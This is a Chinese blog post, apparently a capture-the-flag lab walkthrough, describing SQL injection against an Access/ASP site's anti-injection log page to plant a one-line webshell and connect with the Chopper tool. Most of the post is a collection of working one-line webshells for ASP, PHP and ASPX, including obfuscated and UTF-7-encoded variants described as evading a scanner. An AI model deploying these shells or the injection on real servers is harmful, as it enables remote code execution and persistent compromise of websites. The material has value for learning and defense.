SQL注入实战(防注入)-Access<墨者学院漏洞操作记录>

1、 打开靶场

拿御剑扫秒后台


 

百度得知所有记录会保存在sqlin.asp的目录

2、 插入一句话木马 <%eval request(“user”)%>

http://219.153.49.228:47828/news.asp?id=1%20

and%201=%3C%eval%20request(%22user%22)%%3E



3、 对木马进行URLencode

使用菜刀连接并找到key;

常用的一句话木马

常用一句话木马

asp一句话木马:
  
 <%execute(request("value"))%>
  php一句话木马:
  
 <?php @eval($_POST[value]);?>
  aspx一句话木马:
  
<%@ Page Language="Jscript"%>
  <%eval(Request.Item["value"])%>

其他一句话木马:

<%eval request("value")%>
  <%execute request("value")%>
  <%execute(request("value"))%>
  <%If Request("value")<>"" Then Execute(Request("value"))%>
  <%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>
  <SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT>
  <%@ Page Language="Jscript"%>
  <%eval(Request.Item["value"],"unsafe");%>
  可以躲过雷客图的一句话木马:
  <%
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
  ms.Language="VBScript"
  ms.AddObject "Response", Response
  ms.AddObject "request", request
  ms.ExecuteStatement("ev"&"al(request(""value""))")
  %>
  不用'<,>'的asp一句话木马:
  <script language=VBScript runat=server>execute request("value")</script>
  不用双引号的一句话木马:
  <%eval request(chr(35))%>

UTF-7编码加密:

<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值